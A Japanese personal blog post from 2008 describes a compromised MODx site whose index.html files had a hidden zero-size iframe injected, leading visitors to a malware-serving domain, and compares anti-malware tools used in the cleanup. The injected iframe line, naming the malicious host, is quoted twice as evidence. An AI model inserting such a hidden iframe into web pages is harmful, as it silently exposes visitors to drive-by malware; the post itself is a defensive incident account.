MODxが改ざんされた?

2008年9月20日、MODxで構築中のサイトへ久しぶりにアクセスした。今後どう発展させていこうかと考えるためだった。

PCの動作が重くなる。

「あれ、MODxってこんなに重かったかな」などとのん気に構えていた。それでもPCの様子がおかしいまま。不吉なものを感じた。

するとスパイウェア駆除ツールに偽装したウィンドウが表示されるではないか。

ここのところスパイウェアにやられっぱなしだったが、自宅のパソコンもとうとうやられてしまった。タイミング的には構築途中の自サイトにアクセスしたことが引き金になっているような気がした。

いくら何でも自サイトがスパイウェアやマルウェアに感染するなどという、そんなアホなことを自分がやるだろうか・・・



その調査はあとにするとして、アンチソフトをいくつかダウンロードして駆除をこころみた。

はじめに、Spybot - Search & Destroy。いわゆる定番ソフトだ。これでスキャンすると出てくる出てくる。100以上のファイルが感染されていた。問題箇所が見つかれば削除できるようだが、なんか上手くいかないような。

f0173567_16161562.jpg


次にMalwarebytes' Anti-Malware。のアンチマルウェアソフト。これはかなり強力そうだ。Spybot - Search & Destroyが検知しないマルウェア、スパイウェアも検知する。

f0173567_17172087.jpg


検知したファイルの削除もバッチリだった。チェックされたファイルを一気に削除。そしてWindows 2000を再起動。

するとブルースクリーンが表示されるではないか。削除してはいけないファイルまで削除してしまったのだろうか。

セーフモードでもだめ。よく見ると、セーフモードの下の方に、正常に起動したときの状態で再起動できる項目があった。これを選択してさらに再起動。

あ~、よかった。何とか起動できた。

ここでいったん、必要なファイルをLinuxサーバーにバックアップ。普段だらしないのが災いしたようだ。子どもの写真だけは死守しなければならないんで、パパはがんばった。

せっかくなのでいろいろツールを試してみた。次はSUPERAntiSpyware


f0173567_1717537.jpg


これもなかなか強力。前述のツールでもれたスパイウェアがさらに検知できた。そして削除。もっともこうしている間にも、スパイウェアやマルウェアは増殖しているかもしれないので、どれが最も優秀なツールなのかは確定できない。

ここで、ウィルスチェックソフトでチェックしてみた。Avira AntiVir Personal。AVGよりも私にはなじみがあるツールだ。


f0173567_17182278.jpg


もともとウィルスが潜んでいるのはわかっている。メールの添付ファイルだ。ただ、私はOutlookやOutlook Expressのようなスパマーに狙われやすいメーラーは使っていない。EdMaxユーザーなのでウィルスについては甘く見ていた。

ここでPCの中ではなく、ことの発端となった自サイトにアクセスしてみた。Avira AntiVir Personalのオンラインスキャンがアクセスを拒否するよう警告音を発するではないか。

そこで、FTPにてindex.htmlファイルをLinuxサーバーにダウンロードし、どうなっているのか調べてみた。通常、MODxデフォルトのindex.htmlにはこう書かれている。

<h2>Unauthorized access</h2>
You're not allowed to access file folder


これだけである。ディレクトリーの中を見せないようにデフォルトで配慮されている。ところがである。私の構築中のサイトにある全てのindex.htmlはこうなっていたのだった。改ざんだった。

<h2>Unauthorized access</h2>
You're not allowed to access file folder
<iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>


そう、この怪しげなサイトに誘導し、さらにリダイレクトでスパイウェアやマルウェアを自動的にダウンロードさせるサイトに連れてかれてしまうのだった。

オープンなCMSは、ソースが公開されているので、スパマーにとってはどのディレクトリーにあるどのファイルを改ざんすればよいか一目瞭然なのだ。当初は私自身が改ざんを誘発するような何かをしてしまったのかとも考えたが、ファイルの更新日時を見る限りその時間に何かをしたことはなかったと記憶している。どんな方法で書き換えられたのかは分からないが、書き込み不可としておくべきだったと反省している。

ちなみにこのサイトはどの検索エンジンにもインデックスされていないので、被害はないと信じているが・・・。じゃぁ誰がどうやってという話にもなるわけだ。

今は改ざんされて箇所はすべて正常なものに修正している。

で、このエントリーで書きたかったことは、以下のとおり。

<h2>Unauthorized access</h2>
You're not allowed to access file folder
<iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>


このコードを検知して警告できたのは、Avira AntiVir Personalだけであった。

f0173567_1721429.jpg


感染したファイルをクリックせずとも、ファイルを含むフォルダーを開けただけで警告してくれる。非常に優れものだ。

他のリアルタイムスキャンを有するどのツールも検知できなかった。いってみればただのテキストであるから、すり抜けてしまうということか。

また、フリーのためリアルタイムスキャンが限定されているツールでは、手動でスキャンしてみたがやはり検知できなかった。

たった一つのツールでセキュリティを万全にできないようで、これからは選択肢をいつくも用意しておいた方が良さそうだ。

また、これはMODxに限ったことではないと思われる。他のCMSでも同じ話であり、オープンソースを利用しているサイトは十分に注意しなければならない。

最後に、上記サイトにアクセスしてはいけません。
[PR]

  by suiteama | 2008-09-22 17:24 | WEB全般

<< 情報漏洩対策をどうするかが問題だ 東大生並に頭がよくなるかもしれ... >>

SEM SKIN - DESIGN by SEM EXE

free seo tool